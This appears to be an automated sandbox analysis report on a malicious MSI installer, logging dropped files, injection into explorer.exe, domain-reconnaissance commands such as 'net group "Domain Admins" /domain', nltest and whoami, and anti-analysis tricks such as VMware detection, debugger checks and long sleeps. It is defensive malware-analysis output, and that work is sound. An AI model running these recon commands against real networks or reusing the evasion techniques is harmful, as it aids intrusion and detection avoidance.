Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll

Source: C:\Windows\Installer\MSI17D3.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: fes.msi

Static file information: File size 2200576 > 1048576

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI17D3.tmp, 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, MSI17D3.tmp, 00000003.00000000.1684254663.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, fes.msi, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI17D3.tmp, 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, MSI17D3.tmp, 00000003.00000000.1684254663.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, fes.msi, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr

Source: C:\Windows\explorer.exe

Code function: 9_2_0E6289E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_0E6289E4

Source: avutil.dll.1.dr

Static PE information: real checksum: 0x38ca43 should be: 0x1b07ed

Source: avutil.dll.1.dr	Static PE information: section name: .xdata
Source: avutil.dll.1.dr	Static PE information: section name: .debug

Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CD323C push ecx; ret	3_2_00CD324F
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CBDA73 push edi; iretd	3_2_00CBDA74
Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_000001E51CC60105 push ecx; retf	5_3_000001E51CC6010E

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSI17D3.tmp

Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1658.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI15E9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI16A8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\avutil.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17D3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1688.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1658.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI15E9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI16A8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17D3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1688.tmp	Jump to dropped file

Boot Survival

Uses net.exe to modify the status of services

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\net.exe net config workstation

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000001E51AE171E4 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_000001E51AE171E4

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Source: C:\Windows\explorer.exe

Code function: 9_2_0E6276DC rdtsc

9_2_0E6276DC

Source: C:\Windows\explorer.exe

Code function: 9_2_0E624948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

9_2_0E624948

Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	5_2_000001E51E964D00
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	9_2_03118424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	9_2_03117274

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 501	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8856	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 888	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 863	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1658.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI15E9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI16A8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\avutil.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1688.tmp	Jump to dropped file

Source: C:\Windows\System32\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_5-71587
Source: C:\Windows\Installer\MSI17D3.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_3-32923

Source: C:\Windows\Installer\MSI17D3.tmp

API coverage: 6.3 %

Source: C:\Windows\explorer.exe TID: 7592	Thread sleep count: 231 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7592	Thread sleep time: -231000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7600	Thread sleep count: 501 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7600	Thread sleep time: -50100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7592	Thread sleep count: 8856 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7592	Thread sleep time: -8856000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CEB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00CEB02D
Source: C:\Windows\explorer.exe	Code function: 9_2_0311A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,	9_2_0311A8E0
Source: C:\Windows\explorer.exe	Code function: 9_2_03112B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_03112B28
Source: C:\Windows\explorer.exe	Code function: 9_2_031204C0 FindFirstFileW,	9_2_031204C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E626604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	9_2_0E626604
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6216F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_0E6216F4

Source: C:\Windows\explorer.exe

Code function: 9_2_0E62AC90 GetSystemInfo,

9_2_0E62AC90

Source: explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000002.4143464537.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000009.00000000.1925954013.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000003.3467991469.0000000009929000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000009.00000000.1925954013.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000003.3467991469.0000000009929000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000002.4143464537.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000009.00000002.4147116004.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\rundll32.exe

API call chain: ExitProcess graph end node

graph_5-71005

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\explorer.exe

Code function: 9_2_0E6276DC rdtsc

9_2_0E6276DC

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000001E51E94CCE0 LdrGetProcedureAddress,

5_2_000001E51E94CCE0

Source: C:\Windows\Installer\MSI17D3.tmp

Code function: 3_2_00CBD0A5 IsDebuggerPresent,OutputDebugStringW,

3_2_00CBD0A5

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000001E51AE2371C EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

5_2_000001E51AE2371C

Source: C:\Windows\explorer.exe

Code function: 9_2_0E624948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

9_2_0E624948

Source: C:\Windows\explorer.exe

Code function: 9_2_0E6289E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_0E6289E4

Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CE2DCC mov ecx, dword ptr fs:[00000030h]		3_2_00CE2DCC
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CEAD78 mov eax, dword ptr fs:[00000030h]		3_2_00CEAD78

Source: C:\Windows\Installer\MSI17D3.tmp

Code function: 3_2_00CB2310 GetProcessHeap,

3_2_00CB2310

Source: C:\Windows\System32\msiexec.exe

